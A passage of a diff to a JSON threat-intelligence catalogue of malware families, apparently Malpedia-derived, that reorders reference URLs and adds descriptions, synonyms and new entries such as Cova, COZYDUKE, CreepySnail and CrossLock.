+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent",
+ "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573",
+ "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
"https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures",
+ "https://www.ic3.gov/Media/News/2021/210521.pdf",
+ "https://damonmccoy.com/papers/Ransomware_eCrime22.pdf",
+ "https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/",
+ "https://arcticwolf.com/resources/blog/conti-ransomware-leak-analyzed",
+ "https://medium.com/@whickey000/how-i-cracked-conti-ransomware-groups-leaked-source-code-zip-file-e15d54663a8",
+ "https://www.bleepingcomputer.com/news/security/hackers-use-contis-leaked-ransomware-to-attack-russian-companies/",
+ "https://cocomelonc.github.io/malware/2023/02/10/malware-analysis-8.html",
+ "https://assets.sentinelone.com/ransomware-enterprise/conti-ransomware-unpacked",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728",
+ "https://www.darktrace.com/en/blog/the-double-extortion-business-conti-ransomware-gang-finds-new-avenues-of-negotiation/",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/",
+ "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
+ "https://www.bleepingcomputer.com/news/security/conti-ransomware-source-code-leaked-by-ukrainian-researcher/",
+ "https://www.bleepingcomputer.com/news/security/conti-ransomwares-internal-chats-leaked-after-siding-with-russia/",
+ "https://www.youtube.com/watch?v=cYx7sQRbjGA",
+ "https://thedfirreport.com/2021/05/12/conti-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
+ "https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf",
+ "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
+ "https://www.threatstop.com/blog/conti-ransomware-source-code-leaked",
+ "https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html",
+ "https://www.prevailion.com/what-wicked-webs-we-unweave/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
+ "https://www.youtube.com/watch?v=hmaWy9QIC7c",
+ "https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74",
+ "https://threatpost.com/affiliate-leaks-conti-ransomware-playbook/168442/",
+ "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one",
+ "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/",
+ "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://cyware.com/news/ransomware-becomes-deadlier-conti-makes-the-most-money-39e17bae/",
+ "https://news.sophos.com/en-us/2022/02/22/cyberthreats-during-russian-ukrainian-tensions-what-can-we-learn-from-history-to-be-prepared/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
+ "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/",
+ "https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/",
+ "https://www.prodaft.com/m/reports/Conti_TLPWHITE_v1.6_WVcSEtc.pdf",
+ "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
"https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
- "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love"
+ "https://intel471.com/blog/conti-vs-monti-a-reinvention-or-just-a-simple-rebranding",
+ "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/",
+ "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://intel471.com/blog/shipping-companies-ransomware-credentials",
+ "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/",
+ "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/",
+ "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups",
+ "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks",
+ "https://cluster25.io/2022/03/02/contis-source-code-deep-dive-into/",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
+ "https://github.com/TheParmak/conti-leaks-englished",
+ "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked",
+ "https://twitter.com/AltShiftPrtScn/status/1417849181012647938",
+ "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
+ "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love",
+ "https://www.youtube.com/watch?v=uORuVVQzZ0A",
+ "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/",
+ "https://www.elliptic.co/blog/conti-ransomware-nets-at-least-25.5-million-in-four-months",
+ "https://www.mbsd.jp/2022/03/08/assets/images/MBSD_Summary_of_ContiLeaks_Rev3.pdf",
+ "https://www.zscaler.com/blogs/security-research/conti-ransomware-attacks-persist-updated-version-despite-leaks",
+ "https://twitter.com/TheDFIRReport/status/1498642512935800833",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022",
+ "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf",
+ "https://www.redhotcyber.com/post/il-ransomware-conti-si-schiera-a-favore-della-russia",
+ "https://www.mbsd.jp/research/20210413/conti-ransomware/",
+ "https://github.com/cdong1012/ContiUnpacker",
+ "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
+ "https://twitter.com/AltShiftPrtScn/status/1350755169965924352",
+ "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
+ "https://twitter.com/AltShiftPrtScn/status/1423188974298861571",
+ "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
+ "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/",
+ "https://share.vx-underground.org/Conti/",
+ "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html",
+ "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations",
+ "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/",
+ "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger",
+ "https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/",
+ "https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd",
+ "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
+ "https://www.bleepingcomputer.com/news/security/hhs-conti-ransomware-encrypted-80-percent-of-irelands-hse-it-systems/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf"
],
"synonyms": [],
"type": []
@@ -18318,8 +19427,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee",
- "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks",
"https://content.fireeye.com/apt/rpt-apt38",
+ "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks",
"https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks"
],
"synonyms": [
@@ -18340,27 +19449,20 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "63be3d30-0c8d-4c0a-8eee-6c96880734cb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b",
"value": "CookieBag"
},
{
- "description": "",
+ "description": "According to PCRIsk, CopperStealer, also known as Mingloa, is a malicious program designed to steal sensitive/personal information. It also has the capability to cause chain infections (i.e., download/install additional malware).\r\n\r\nSignificant activity of CopperStealer has been observed in Brazil, India, Indonesia, Pakistan, and the Philippines. At the time of research, this malware had been noted being spread via websites offering illegal activation tools (\"cracks\") for licensed software products.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.copper_stealer",
"https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft",
"https://www.trendmicro.com/en_us/research/22/h/copperstealer-distributes-malicious-chromium-browser-extension-steal-cryptocurrencies.html"
],
- "synonyms": [],
+ "synonyms": [
+ "Mingloa"
+ ],
"type": []
},
"uuid": "87afcc5d-27f6-4427-b43c-4621a66e5041",
@@ -18371,8 +19473,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot",
- "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/",
"https://www.crowdstrike.com/blog/ecrime-ecosystem/",
+ "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf"
],
"synonyms": [],
@@ -18386,11 +19488,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn",
- "https://blog.alyac.co.kr/2105",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/#atricle-content",
"https://www.symantec.com/security-center/writeup/2018-021216-4405-99#technicaldescription",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/",
"https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/"
+ "https://blog.alyac.co.kr/2105",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/#atricle-content"
],
"synonyms": [],
"type": []
@@ -18403,27 +19505,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell",
- "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
- "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "http://malware.prevenity.com/2014/08/malware-info.html",
"http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html",
- "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf"
+ "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
+ "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "http://malware.prevenity.com/2014/08/malware-info.html"
],
"synonyms": [
"SOURFACE"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "3948ce95-468e-4ce1-82b1-57439c6d6afd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e",
"value": "Coreshell"
},
@@ -18447,8 +19540,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cosmicduke",
- "https://www.cyfirma.com/outofband/cosmicduke-malware-analysis/",
- "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf"
+ "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf",
+ "https://www.cyfirma.com/outofband/cosmicduke-malware-analysis/"
],
"synonyms": [],
"type": []
@@ -18461,18 +19554,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx",
- "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
- "https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://vblocalhost.com/uploads/VB2020-20.pdf",
- "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf",
"https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf",
- "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf",
- "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
- "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html"
+ "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf",
+ "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
+ "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
+ "https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html",
+ "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf",
+ "https://vblocalhost.com/uploads/VB2020-20.pdf",
+ "https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
@@ -18480,6 +19573,19 @@
"uuid": "47190b56-5176-4e8b-8c78-fcc10e511fa2",
"value": "Cotx RAT"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cova",
+ "https://www.bitsight.com/blog/cova-and-nosu-new-loader-spreads-new-stealer"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cad667c1-be0a-49db-b2fb-462082a04fbe",
+ "value": "Cova"
+ },
{
"description": "Covicli is a modified SSLeay32 dynamic library designated as a backdoor.\r\nThe dynamic library allows the attacker to communicate with the C2 over openSSL.",
"meta": {
@@ -18509,7 +19615,7 @@
"value": "Covid22"
},
{
- "description": "",
+ "description": "PCRisk notes that CoViper is yet another Coronavirus/COVID-19-themed malware infection, most likely proliferated as a file related to the pandemic. It operates by rewriting the system Master Boot Record (MBR). It does not delete the original, but rather creates a backup and replaces it with a custom MBR.\r\n\r\nTypically, malicious software that modifies MBRs do so to prevent the Operating System (OS) from being booted (i.e., started). It also displays a screen-encompassing message, often containing a ransom message - this disables user access to the device. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.coviper",
@@ -18522,6 +19628,25 @@
"uuid": "4d7d8496-52a6-47dc-abfe-4997af6dc465",
"value": "CoViper"
},
+ {
+ "description": "CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around\r\na core backdoor component. This component can be instructed by the C&C server to download\r\nand execute arbitrary modules, and it is these modules that provide CozyDuke with its vast array\r\nof functionality. Known CozyDuke modules include:\r\n• Command execution module for executing arbitrary Windows Command Prompt commands\r\n• Password stealer module\r\n• NT LAN Manager (NTLM) hash stealer module\r\n• System information gathering module\r\n• Screenshot module",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cozyduke",
+ "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html"
+ ],
+ "synonyms": [
+ "Cozer",
+ "CozyBear",
+ "CozyCar",
+ "EuroAPT"
+ ],
+ "type": []
+ },
+ "uuid": "b461afd0-f5fd-4c25-8367-4235a6e8b9b1",
+ "value": "COZYDUKE"
+ },
{
"description": "CRACKSHOT is a downloader that can download files, including binaries, and run them from the hard disk or execute them directly in memory. It is also capable of placing itself into a dormant state.",
"meta": {
@@ -18552,11 +19677,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.crat",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://suspected.tistory.com/269",
"https://mp.weixin.qq.com/s/2sV-DrleHiJMSpSCW0kAMg",
- "https://www.secrss.com/articles/18635",
- "https://blog.talosintelligence.com/2020/11/crat-and-plugins.html"
+ "https://suspected.tistory.com/269",
+ "https://blog.talosintelligence.com/2020/11/crat-and-plugins.html",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://www.secrss.com/articles/18635"
],
"synonyms": [],
"type": []
@@ -18582,10 +19707,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.credomap",
+ "https://securityscorecard.com/research/apt28s-stealer-called-credomap",
"https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://cert.gov.ua/article/341128"
+ "https://cert.gov.ua/article/341128",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war"
],
"synonyms": [],
"type": []
@@ -18606,6 +19732,32 @@
"uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706",
"value": "Credraptor"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.creepysnail",
+ "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a95d4aaa-302e-4a3c-a071-ba8eed978920",
+ "value": "CreepySnail"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.creep_exfil",
+ "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fc743725-2fa6-48dd-8797-57e298375505",
+ "value": "CreepExfil"
+ },
{
"description": "",
"meta": {
@@ -18623,39 +19775,39 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson",
- "https://twitter.com/katechondic/status/1502206599166939137",
+ "https://securelist.com/transparent-tribe-part-2/98233/",
+ "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html",
"https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html",
- "https://s.tencent.com/research/report/669.html",
- "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html?m=1",
- "https://labs.k7computing.com/index.php/transparent-tribe-targets-educational-institution/",
+ "https://team-cymru.com/blog/2021/04/16/transparent-tribe-apt-infrastructure-mapping/",
"https://www.secrss.com/articles/24995",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg",
- "https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/",
- "https://securelist.com/transparent-tribe-part-1/98127/",
"https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://blog.yoroi.company/research/transparent-tribe-four-years-later",
+ "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/",
+ "https://s.tencent.com/research/report/669.html",
+ "https://www.4hou.com/posts/vLzM",
"https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf",
+ "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html",
+ "https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/",
+ "https://mp.weixin.qq.com/s/ELYDvdMiiy4FZ3KpmAddZQ",
+ "https://labs.k7computing.com/index.php/transparent-tribe-targets-educational-institution/",
"https://twitter.com/teamcymru_S2/status/1501955802025836546",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://securelist.com/transparent-tribe-part-1/98127/",
+ "https://blog.yoroi.company/research/transparent-tribe-four-years-later",
+ "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF",
+ "https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html?m=1",
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://twitter.com/teamcymru/status/1351228309632385027",
"https://anchorednarratives.substack.com/p/trouble-in-asia-and-the-middle-east",
"https://team-cymru.com/blog/2021/07/02/transparent-tribe-apt-infrastructure-mapping-2/",
- "https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/",
- "https://twitter.com/teamcymru/status/1351228309632385027",
- "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg",
+ "https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/",
"https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html",
- "https://www.4hou.com/posts/vLzM",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF",
- "https://securelist.com/transparent-tribe-part-2/98233/",
- "https://team-cymru.com/blog/2021/04/16/transparent-tribe-apt-infrastructure-mapping/",
- "https://mp.weixin.qq.com/s/ELYDvdMiiy4FZ3KpmAddZQ",
- "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
- "https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/"
+ "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg",
+ "https://twitter.com/katechondic/status/1502206599166939137"
],
"synonyms": [
"SEEDOOR",
@@ -18684,11 +19836,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cring",
- "https://twitter.com/swisscom_csirt/status/1354052879158571008",
"https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Vulnerability-in-Fortigate-VPN-servers-is-exploited-in-Cring-ransomware-attacks-En.pdf",
+ "https://twitter.com/swisscom_csirt/status/1354052879158571008",
"https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728",
- "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html"
],
"synonyms": [],
"type": []
@@ -18696,25 +19848,38 @@
"uuid": "f5a19987-d0b6-4cc3-89ab-d4540f2e9744",
"value": "Cring"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crosslock",
+ "https://twitter.com/1ZRR4H/status/1648232869809078273"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "505dc6be-56f3-49ca-be11-45b3e78a4ac2",
+ "value": "CrossLock"
+ },
{
"description": "According to FireEye, CROSSWALK is a skeletal, modular backdoor capable of system survey and adding modules in response to C&C replies.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk",
+ "https://www.youtube.com/watch?v=8x-pGlWpIYI",
+ "https://twitter.com/MrDanPerez/status/1159459082534825986",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware",
"https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/",
+ "https://www.youtube.com/watch?v=FttiysUZmDw",
+ "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-state-sponsored-espionage-group-targeting-multiple-verticals-with-crosswalk/",
+ "https://thehackernews.com/2021/01/researchers-disclose-undocumented.html",
+ "https://content.fireeye.com/apt-41/rpt-apt41/",
+ "https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
"https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
- "https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayfly-china-sidewalk-malware",
"https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.youtube.com/watch?v=8x-pGlWpIYI",
- "https://thehackernews.com/2021/01/researchers-disclose-undocumented.html",
- "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-state-sponsored-espionage-group-targeting-multiple-verticals-with-crosswalk/",
- "https://www.youtube.com/watch?v=FttiysUZmDw",
- "https://twitter.com/MrDanPerez/status/1159459082534825986",
